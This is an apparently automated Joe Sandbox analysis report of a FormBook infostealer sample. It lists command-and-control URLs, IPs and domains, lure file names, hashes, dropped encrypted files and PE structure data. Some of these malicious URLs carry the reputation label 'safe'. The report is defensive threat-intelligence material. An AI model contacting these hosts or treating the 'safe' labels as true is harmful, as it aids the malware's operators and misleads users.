http://www.laohub10.net/36be/?KBEhCJ=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7tD9cl/byRSbJ8t/R3+K3cKRBXN0bJbe4ZjKihmDBlTXN1Q==&Kdr=RN-HMNoXj6pXm	false	Avira URL Cloud: safe	unknown
http://www.logidant.xyz/iuvu/?KBEhCJ=4GSi4NjhieA+eby0NKQzTEPCPA5td1TZNopVgGr+MixqN2kv+x7vZ9YkKN38Qwr7I1LnRiqAhNhB07BIn5ynY1PA81WB0aqcrP8TCrRqA4T6i/Y0YCRnlTl6YfLJ6nzbiw==&Kdr=RN-HMNoXj6pXm	false	Avira URL Cloud: safe	unknown
http://www.madhf.tech/0mwe/	false	Avira URL Cloud: safe	unknown
http://www.yunlekeji.top/t322/	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.zkdamdjj.shop	ldZEVEbpOrO.exe, 00000006.00000002.3898070817.0000000004BA9000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.litespeedtech.com/error-page	mobsync.exe, 00000005.00000002.3897126671.0000000005704000.00000004.10000000.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.0000000002AE4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2613143278.000000002E024000.00000004.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.madhf.tech/0mwe/?Kdr=RN-HMNoXj6pXm&KBEhCJ=I6/MvosI1M4GXnAC7bSYGFqrxYdgJTNe9tmkEszzRtOWIwR	ldZEVEbpOrO.exe, 00000006.00000002.3896751576.0000000002E08000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.canadavinreport.site/g3h7/?KBEhCJ=dyqW	mobsync.exe, 00000005.00000002.3898565622.0000000007D70000.00000004.00000800.00020000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.0000000002F9A000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://aballanet.cat/6xrr/?KBEhCJ=HxJAUmNG5a	mobsync.exe, 00000005.00000002.3897126671.0000000005896000.00000004.10000000.00040000.00000000.sdmp, ldZEVEbpOrO.exe, 00000006.00000002.3896751576.0000000002C76000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	mobsync.exe, 00000005.00000003.2497553805.00000000080CE000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.141.156.114	logidant.xyz	Germany	30860	YURTEH-ASUA	true
165.154.96.210	fap-a13f5c64.faipod.com	Canada	7456	INTERHOPCA	false
27.124.4.246	r0lqcud7.nbnnn.xyz	Singapore	64050	BCPL-SGBGPNETGlobalASNSG	false
188.114.96.3	www.zkdamdjj.shop	European Union	13335	CLOUDFLARENETUS	false
103.224.182.242	www.madhf.tech	Australia	133618	TRELLIAN-AS-APTrellianPtyLimitedAU	false
185.27.134.206	www.canadavinreport.site	United Kingdom	34119	WILDCARD-ASWildcardUKLimitedGB	false
104.21.36.62	www.izmirescortg.xyz	United States	13335	CLOUDFLARENETUS	false
134.0.14.158	aballanet.cat	Spain	197712	CDMONsistemescdmoncomES	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588375
Start date and time:	2025-01-11 01:38:21 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	tfWjjV1LdT.exe renamed because original name is a hash value
Original Sample Name:	bd2476bf4c51a0a98316cf0efcf28cdda8e6cdad976f22a6a390e57867a7c76c.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/3@9/8
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 49 Number of non-executed functions: 275
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.141.156.114	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/iuvu/
	Recibos.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/ctvu/
	YH-3-12-2024-GDL Units - Projects.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/iuvu/
	BASF Hung#U00e1ria Kft.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/iuvu/
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/ctvu/
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/ctvu/
	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/iuvu/
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.logidant.xyz/ctvu/
165.154.96.210	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	www.yunlekeji.top/t322/
27.124.4.246	PO 4110007694.exe	Get hash	malicious	FormBook	Browse	www.laohub10.net/sgdd/
	Latest advice payment.exe	Get hash	malicious	FormBook	Browse	www.laohub10.net/sgdd/
	BASF Hung#U00e1ria Kft.exe	Get hash	malicious	FormBook	Browse	www.laohub10.net/36be/
	OUTSTANDING BALANCE PAYMENT.exe	Get hash	malicious	FormBook	Browse	www.laohub10.net/sgdd/
	purchase Order.exe	Get hash	malicious	FormBook	Browse	www.laohub10.net/sgdd/
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.laohub10.net/sgdd/
188.114.96.3	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	www.zkdamdjj.shop/kf1m/
	https://cocteldedeas.mx/rx567#cmVjaWJhc2VAc2VhbWFyaXRpbWEuY29t	Get hash	malicious	HTMLPhisher	Browse	cocteldedeas.mx/rx567/
	ofZiNLLKZU.exe	Get hash	malicious	FormBook	Browse	www.zrichiod-riech.sbs/kf10/
	KcSzB2IpP5.exe	Get hash	malicious	FormBook	Browse	www.cifasnc.info/9kxb/?SDC=3P5Gm1XciD5wQdS+7olugPzxqsRcbkm2h5Eq/rLsNh2+B342K587ak9zFSbTb4g5MvE40jzEqyGLe8su/vgeQxV3BBvpqLfi5EtkufMqD+H/d+eq3w==&mH=CpePy0P
	1162-201.exe	Get hash	malicious	FormBook	Browse	www.einpisalpace.shop/pgw3/
	https://ik.imagekit.io/nrof2h909/Sherman%20Pruitt,%20Chief%20of%20Police,%20MSCJ.pdf?updatedAt=1736444487005	Get hash	malicious	Unknown	Browse	jackoffjackofflilliilkillxoopoeadonline.top/drive/
	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/?xP7x=4VB/N4F6tibqC9FQILosJ+n1llTK4MiF4YtEqiz3GsaSMOHPZtZI38ZqeQNXmBxLoc2gIm7YkXHcJ/CISLsxa/r9DhwgcU3z86+N04yu78wK1Du9wX32CCg=&F4=Q0yHy
	GTA5-elamigos.exe	Get hash	malicious	Esquele Stealer	Browse	/api/get/dll
	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/u7ghXEYp/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
r0lqcud7.nbnnn.xyz	uG3I84bQEr.exe	Get hash	malicious	FormBook	Browse	23.225.159.42
	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	202.79.161.151
	order confirmation.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
	UPDATED CONTRACT.exe	Get hash	malicious	FormBook	Browse	23.225.159.42
	PO 4110007694.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
	Latest advice payment.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
	Document_084462.scr.exe	Get hash	malicious	FormBook, GuLoader	Browse	23.225.159.42
	quotation.exe	Get hash	malicious	FormBook	Browse	27.124.4.246
	YH-3-12-2024-GDL Units - Projects.exe	Get hash	malicious	FormBook	Browse	23.225.159.42
	Proforma invoice - Arancia NZ.exe	Get hash	malicious	FormBook	Browse	202.79.161.151
www.madhf.tech	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	PO2412010.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Document_084462.scr.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.224.182.242
	New Purchase Order.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Purchase Order..exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	YH-3-12-2024-GDL Units - Projects.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Proforma invoice - Arancia NZ.exe	Get hash	malicious	FormBook	Browse	103.224.182.242
	Quotation Validity.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	103.224.182.242
	BASF Hung#U00e1ria Kft.exe	Get hash	malicious	FormBook	Browse	15.204.67.7
	Purchase Order PO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	103.224.182.242
www.izmirescortg.xyz	Gz2FxKx2cM.exe	Get hash	malicious	FormBook	Browse	104.21.36.62
	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	172.67.186.192
	YH-3-12-2024-GDL Units - Projects.exe	Get hash	malicious	FormBook	Browse	104.21.36.62
	Order MEI PO IM202411484.exe	Get hash	malicious	FormBook	Browse	172.67.186.192
	BASF Hung#U00e1ria Kft.exe	Get hash	malicious	FormBook	Browse	172.67.186.192
	IETC-24017.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	172.67.186.192
	file.exe	Get hash	malicious	FormBook	Browse	172.67.186.192
	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	104.21.36.62
fap-a13f5c64.faipod.com	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	165.154.96.210

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BCPL-SGBGPNETGlobalASNSG	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	202.79.161.151
	9MZZG92yMO.exe	Get hash	malicious	FormBook	Browse	134.122.133.80
	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	134.122.133.80
	xsYbMYg5Dr.exe	Get hash	malicious	Unknown	Browse	137.220.229.26
	https://199.188.109.181	Get hash	malicious	Unknown	Browse	134.122.133.80
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	202.95.11.110
	QUOTATION#070125-ELITE MARINE .exe	Get hash	malicious	FormBook	Browse	202.95.11.110
	QUOTATION#050125.exe	Get hash	malicious	FormBook	Browse	202.95.11.110
	0Z2lZiPk5K.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	134.122.133.80
	DHL DOCS 2-0106-25.exe	Get hash	malicious	FormBook	Browse	134.122.135.48
YURTEH-ASUA	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	http://www.efnhdh.blogspot.mk/	Get hash	malicious	GRQ Scam	Browse	152.89.61.96
	https://alluc.co/watch-movies/passengers.html	Get hash	malicious	Unknown	Browse	31.42.184.242
	Recibos.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	YH-3-12-2024-GDL Units - Projects.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	BASF Hung#U00e1ria Kft.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	45.141.156.114
INTERHOPCA	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	165.154.96.210
	arm4.elf	Get hash	malicious	Mirai	Browse	165.154.119.54
	i686.elf	Get hash	malicious	Mirai	Browse	165.154.144.14
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	165.154.119.65
	sh4.elf	Get hash	malicious	Mirai	Browse	165.154.120.14
	https://mj.ostep.net/acknowledgements	Get hash	malicious	Unknown	Browse	165.154.182.38
	firmware.mipsel.elf	Get hash	malicious	Unknown	Browse	165.154.232.175
	http://www771771u.com/	Get hash	malicious	Unknown	Browse	165.154.224.29
	http://www.choeshop.com	Get hash	malicious	Unknown	Browse	165.154.254.46
	PTT Group project - Quotation.exe	Get hash	malicious	FormBook	Browse	165.154.0.120

Process:	C:\Windows\SysWOW64\mobsync.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.121297215059106
Encrypted:	false
SSDEEP:	384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
MD5:	D87270D0039ED3A5A72E7082EA71E305
SHA1:	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
SHA-256:	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
SHA-512:	18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autE986.tmp

Download File

Process:	C:\Users\user\Desktop\tfWjjV1LdT.exe
File Type:	data
Category:	dropped
Size (bytes):	287232
Entropy (8bit):	7.995842706440756
Encrypted:	true
SSDEEP:	6144:gyMzoDqhz3W5VMKRY5pwFslIXjjL9YwurD1OXqj8Iu879UpJ0I0M:6oDqhzsMpwGIzMfkXBR62py9M
MD5:	77929550A3F86CC051FA8F3E7450E297
SHA1:	A3E7577B038E3D7F78D2449BB68A440E9A214EC6
SHA-256:	E27EE42B6014D5A9B824FC10A5EB5359A59DB781D0C62C1BCBF12EF7C9CFE873
SHA-512:	E78D994F47EFF564CBDD5BE00EC4972982F8EB7B305AD029D05D5D518FB9A1691B7B0D84428AF5938FB63C02E133503ED601D992282B03C8A0607887A6AA6911
Malicious:	false
Reputation:	low
Preview:	...6ANRJEUG3..YW.1R7LH57.JU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3.4YWJ..9L.<.d.Tz.o."(&gC?[>%%\rT-&[X1j7Sb<'$a<)..{.w)^6RbE8=aJU6BNRJ8TN.pT>.yQ5.q(R._...x.5.[...qT>.^...p(R..#6^..5.AUG3M4YW.tR7.I47.b.VBNRJAUG3.4[VO0Y7L.17EJU6BNRJ.AG3M$YWDQV7LHu7EZU6BLRJGUG3M4YWB1R7LH57E*Q6BLRJAUG3O4..D1B7LX57EJE6B^RJAUG3]4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57k>0N6NRJ5.C3M$YWDaV7LX57EJU6BNRJAUG3m4Y7D1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YW

C:\Users\user\AppData\Local\Temp\batchers

Download File

Process:	C:\Users\user\Desktop\tfWjjV1LdT.exe
File Type:	data
Category:	dropped
Size (bytes):	287232
Entropy (8bit):	7.995842706440756
Encrypted:	true
SSDEEP:	6144:gyMzoDqhz3W5VMKRY5pwFslIXjjL9YwurD1OXqj8Iu879UpJ0I0M:6oDqhzsMpwGIzMfkXBR62py9M
MD5:	77929550A3F86CC051FA8F3E7450E297
SHA1:	A3E7577B038E3D7F78D2449BB68A440E9A214EC6
SHA-256:	E27EE42B6014D5A9B824FC10A5EB5359A59DB781D0C62C1BCBF12EF7C9CFE873
SHA-512:	E78D994F47EFF564CBDD5BE00EC4972982F8EB7B305AD029D05D5D518FB9A1691B7B0D84428AF5938FB63C02E133503ED601D992282B03C8A0607887A6AA6911
Malicious:	false
Preview:	...6ANRJEUG3..YW.1R7LH57.JU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3.4YWJ..9L.<.d.Tz.o."(&gC?[>%%\rT-&[X1j7Sb<'$a<)..{.w)^6RbE8=aJU6BNRJ8TN.pT>.yQ5.q(R._...x.5.[...qT>.^...p(R..#6^..5.AUG3M4YW.tR7.I47.b.VBNRJAUG3.4[VO0Y7L.17EJU6BNRJ.AG3M$YWDQV7LHu7EZU6BLRJGUG3M4YWB1R7LH57E*Q6BLRJAUG3O4..D1B7LX57EJE6B^RJAUG3]4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57k>0N6NRJ5.C3M$YWDaV7LX57EJU6BNRJAUG3m4Y7D1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YWD1R7LH57EJU6BNRJAUG3M4YW

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.208137501076956
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	tfWjjV1LdT.exe
File size:	1'225'216 bytes
MD5:	c3689a08e5e324cde3000e0da0261633
SHA1:	f937a0c9e37aeeb64b71799637ce45ed8cd27d1c
SHA256:	bd2476bf4c51a0a98316cf0efcf28cdda8e6cdad976f22a6a390e57867a7c76c
SHA512:	76150d4398121a05cd71136836434ec9d74fac039dfc41724bdd258f66f8278a1fae733a77855603947e937ae3156ef73c4d2af50d1a6584f7431aa3abfd559f
SSDEEP:	24576:bu6J33O0c+JY5UZ+XC0kGso6Fam2e3IU9FXcPEi1uyC4HnWY:Vu0c++OCvkGs9Fam2UXIyVY
TLSH:	0145CE2273DDC360CB669173BF6AB7016EBF7C610630B85B2F980D7DA950162162D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67524AD4 [Fri Dec 6 00:52:36 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F9FD0BA5A2Ah
jmp 00007F9FD0B987F4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F9FD0B9897Ah
cmp edi, eax
jc 00007F9FD0B98CDEh
bt dword ptr [004C31FCh], 01h
jnc 00007F9FD0B98979h
rep movsb
jmp 00007F9FD0B98C8Ch
cmp ecx, 00000080h
jc 00007F9FD0B98B44h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F9FD0B98980h
bt dword ptr [004BE324h], 01h
jc 00007F9FD0B98E50h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F9FD0B98B1Dh
test edi, 00000003h
jne 00007F9FD0B98B2Eh
test esi, 00000003h
jne 00007F9FD0B98B0Dh
bt edi, 02h
jnc 00007F9FD0B9897Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F9FD0B98983h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F9FD0B989D5h
bt esi, 03h
jnc 00007F9FD0B98A28h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x628b0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x12a000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x628b0	0x62a00	6642b70470777a6c5b5f26c63212c8d9	False	0.9331803509188846	data	7.906311393291615	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x12a000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
